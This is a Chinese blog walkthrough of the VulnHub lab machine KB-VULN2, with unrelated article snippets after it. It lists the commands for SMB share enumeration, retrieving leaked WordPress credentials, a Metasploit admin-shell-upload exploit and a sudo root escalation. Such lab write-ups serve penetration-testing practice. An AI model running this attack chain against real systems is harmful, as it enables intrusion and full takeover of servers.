kb2-vuln2(smbmap工具的利用)

最新推荐文章于 2024-08-10 07:51:53 发布
最新推荐文章于 2024-08-10 07:51:53 发布
阅读量2k 收藏 3
点赞数
分类专栏: vulhub系列 文章标签: linux 运维 服务器 centos 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127447700
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:y4rx

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

提示:如果导入靶机到virtualbox里显示“不能为虚拟电脑打开一个新任务“,打开虚拟机设置,选择USB 1.1控制器就解决了,应该是虚拟机版本和virtualbox版本不一致导致的错误。

信息收集:

用nmap对目标进行端口和服务的详细扫描

漏洞利用

1.由于探测到靶机有smb服务,用smbmap工具查看可利用信息

smbmap -H 192.168.1.104 -u guest //对信息进行枚举

smbclient '\\192.168.1.104\Anoymous' -u guest //查看anonymous

get backup.zip 把文件下载下来

2.unzip backup.zip -d backup //解压到backup文件夹

3.进入backup目录查看文件 发现有一个文本文档

4.得到一个用户名密码 admin MachineBoy141

dirsearch -u 192.168.1.104/wordpress/

扫描到wp-login.php 进行访问 发现网站加载不完全 ,应该存在域名!

5.curl -i -L http://192.168.1.104/wordpress/wp-login.php //查看源码 显示 http response 的头信息,连同网页代码一起

6.发现网址前有一个域名 把域名加到 host里

7.用vi /etc/hosts 打开进行配置 source刷新下

8.再次登录就显示正常网页状态

9.启用msfconsole工具

use exploit/unix/webapp/wp_admin_shell_upload
show options
set rhost 192.168.1.104
set targeturi /wordpress
set username admin
set password MachineBoy141
set lport 445
run

权限提升

1.用python反弹交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

2.sudo /bin/bash -p 提权成功!!!

魏钦6666
关注
专栏目录
smbmap:SMBMap是一个方便的SMB枚举工具
04-28
中小企业地图 SMBMap允许用户枚举整个域中的samba共享驱动器。 列出共享驱动器,驱动器权限,共享内容,上载/下载功能,文件名自动下载模式匹配,甚至执行远程命令。 该工具在设计时就考虑了笔测试,旨在简化大型网络中潜在敏感数据的搜索。 其中一些功能尚未经过全面测试,因此发现错误后就会进行更改。 我只有在参与活动时才能真正发现并修复错误,因此进度有点慢。 任何反馈或错误报告,将不胜感激。 它的边缘肯定很粗糙,但是我现在只是尝试添加功能。 2.0版应该清理代码很多……。无论何时实际发生;)。 感谢检查出来!! 用于文件内容搜索功能的SMBServer组件中存在一个已知的问题。 由于某种原因,它会在线程库中引发异常。 它仍然可以工作,但是错误仍然令人讨厌。 安装要求 SMBMap has been updated to Python3! $ python3 -m pip install
smbmap一键查扫描SMB共享信息(KALI工具系列十八)
LNN0212的博客
06-08 1213
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。smbmap 是一个用于快速扫描和检查 SMB(Server Message Block)共享的命令行工具
SMBMap:强大的Samba共享枚举工具
最新发布
gitblog_01198的博客
08-10 388
SMBMap:强大的Samba共享枚举工具 smbmapSMBMap is a handy SMB enumeration tool项目地址:https://gitcode.com/gh_mirrors/smbm/smbmap 在网络安全领域,对网络资源的有效管理和控制至关重要。SMBMap,作为一款开源的Samba共享枚举工具,为安全专业人员提供了一个强大的工具,以帮助他们枚举和管理Samba...
VulnHub靶场之KB-VULN: 2
A_dmin的博客
10-25 665
VulnHub靶场之KB-VULN: 2 扫描IP以及端口: 访问80端口,默认页面,,,,进行目录扫描,熟悉的wordpress: 访问一下,发现显示不全,,,查看一下网页源代码: 添加hosts文件: 再次访问正常,wpscan扫描一下,啥都没扫出来,,,,: 有个admin页面但是没有账号密码进不去,,, 选择转向其他,不是还有个smb么,尝试一下能否匿名登录,有个备份文件: 打开得到一个账号密码,wordpress后台的吧,,,admin/MachineBoy141 尝试登陆,登陆成
SMB攻击利用工具-----acccheck(原理)
SCR_123的博客
08-15 1165
SMB攻击利用工具-----acccheck(原理) 本工具是针对SMB协议的探测工具,但并不具备漏洞利用功能。探测SMB相应的端口和协议分析进行密码破解的,本质功能是密码破解 原理 445开放出来的默认共享:IPC$、ADMIN$,默认情况下只有管理员可以访问共享,acccheck工具尝试连接目标默认共享 net share 查看目标开放的共享 命令参数: -t 一个目标地址 -T 目标地址列表 -u 一个用户名 -U 用户账号列表 -p 一个密码 -P 密码列表 -v 详细列出 演示: 通过开放的默
SMBMap 项目使用教程
gitblog_00188的博客
08-10 358
SMBMap 项目使用教程 smbmapSMBMap is a handy SMB enumeration tool项目地址:https://gitcode.com/gh_mirrors/smbm/smbmap 1. 项目的目录结构及介绍 SMBMap 是一个用于枚举 Samba 共享驱动器的工具,其目录结构相对简单。以下是主要目录和文件的介绍: smbmap/ __init__.py:模块...
Struts2-Vuln-Demo:Struts2防御实例
03-08
开始学习struts2代码审计时,发现各位师傅分析分析的文章很多,但是给突破demo源码的却很少。并且很多重复复现是在struts2官方案例上进行的。而官方案例代码太多,对于初学者来说无法快速聚焦突破点。 所以我在学习...
Struts2-Vuln:关于Struts2框架的历史漏洞个人分析文章
04-23
Struts2-Vuln 本系列文章将详细分析 Java 流行框架 Struts2 的历史漏洞,今后关于 Struts2 新的漏洞分析,也将更新于 项目上。该系列仅是笔者初学 Java代码审计 的一些记录,也希望能够帮助到想学习 Java代码审计 的...
js-vuln-db, 一个用于with的JavaScript引擎的Collection.zip
09-17
js-vuln-db, 一个用于with的JavaScript引擎的Collection 基于的JavaScript引擎漏洞案例研究 V8CVE数字特征关键字CVE-2013-6632TypedArray整数 overflow,OOBPinkieCVE-2014-1705TypedArray无效的
json-interop-vuln-labs:伴随实验室进行“ JSON互操作性漏洞的探索”
03-05
JSON互操作性漏洞实验室 描述 这些是我的研究文章的伴随实验室。 密钥冲突攻击:不一致的重复密钥优先级 ...这些文档利用了注释的不一致支持和无引号的字符串支持: {"qty": 1, "extra": 1/*, "qty
【kali】25 漏洞扫描——nmapsmb-vuln-ms10-061.nse(枚举共享打印机)
(∪.∪ )...zzz的博客
10-22 2378
这里写自定义目录标题一、查看脚本,注意categories二、vuln三、smb-vuln-ms10-061.nse查看脚本查看网络中存活的主机使用脚本扫描目标系统的共享打印机 nmap扫描脚本:500+,不同类别 apt-get install ibus ibus-pinyin #安装中文输入法 一、查看脚本,注意categories cat /usr/share/nmap/scripts/script.db categories里说明了脚本的类型 exploit:漏洞利用 二、vuln c
Smbmap结合攻击(第五十五课).docx
09-15
Smbmap结合攻击(第五十五课).docx
Smbmap结合攻击(第五十五课)1
08-04
Smbmap结合攻击(第五十五课)1
最新kali之smbmap
vanony的博客
01-24 2922
描述:   SMB枚举工具。   SMBMap允许用户枚举整个域中的samba共享驱动器。 列出共享驱动器,驱动器权限,共享内容,上载/下载功能,文件名自动下载模式匹配,甚至执行远程命令。 该工具在设计时就考虑了笔测试,旨在简化大型网络中潜在敏感数据的搜索。 选项: 主要参数: -H HOST 主机IP --host-file FILE 包含主机列表的文件 -u USERNAME 用户名,如果省略,则假定为空会话 -p PASSWORD 密码或NTLM哈希 -s SHARE
靶机渗透练习50-KB-VULN2
hirak0的博客
04-19 446
靶机描述 靶机地址:https://www.vulnhub.com/entry/kb-vuln-2,562/ Description Machine Level : Easy A machine that measures your attention and require your research. This VM is running on VirtualBox. It includes 2 flags:user.txt and flag.txt This works better with Vi
最新SMB僵尸网络利用了7个NSA工具,而WannaCry只用了两个……
weixin_33895475的博客
05-24 185
2019独角兽企业重金招聘Python工程师标准>>> ...
samba工具常用方法笔记
255.255.255.0
01-11 712
#Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置”NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。 #######
探索与控制:SMBMap —— 网络渗透测试的利器
gitblog_00047的博客
05-13 552
探索与控制:SMBMap —— 网络渗透测试的利器 smbmapSMBMap is a handy SMB enumeration tool项目地址:https://gitcode.com/gh_mirrors/smbm/smbmap 在网络安全的世界中,有一种工具,它能帮助我们列举Samba共享驱动器,进行权限检测,并实现远程命令执行。这就是SMBMap,一个专为渗透测试而设计的强大工具。 1...
信息收集12——smbmap,smtp-user-enum,theHarvester,sslscan,ssldump
willow_liang的博客
11-20 2032
smbmap Samba、SMB文件共享枚举工具 SMB协议分析工具 TCP445端口 文件共享 文件上传下载 执行系统指令 WannaCry 基本参数 -u 用户名(省略时为空会话) -p 密码或NTLM hash -d 域名(默认为工作组workgroup ) -P 端口(默认为TCP 445 ) -H 主机地址或名
使用upload上传文件到靶机
07-14
很抱歉,我无法执行实际的文件上传操作,因为作为一个AI模型,我无法直接与外部环境进行交互。我只能提供一些关于上传文件的一般性指导。 要将文件上传到靶机,通常有几种方法可以使用,具体取决于你使用的操作系统和网络环境。以下是一些常见的方法: 1. 使用FTP(文件传输协议):使用FTP客户端软件(如FileZilla)连接到靶机,并将文件上传到指定的目录。 2. 使用SSH(安全外壳协议):使用SSH客户端(如PuTTY)连接到靶机,在终端中使用SCP命令将文件从本地计算机复制到靶机。 3. 使用Web界面:如果靶机有一个基于Web的管理界面,你可以通过登录到该界面并使用文件上传功能来上传文件。 4. 使用云存储服务:如果你的靶机托管在云平台上,你可以使用平台提供的云存储服务(如AWS S3、Google Cloud Storage等)来上传文件。 请记住,具体的步骤可能因操作系统、网络环境和所使用的工具而异。确保在上传文件之前了解靶机的访问权限和安全策略,并遵循最佳实践来确保安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值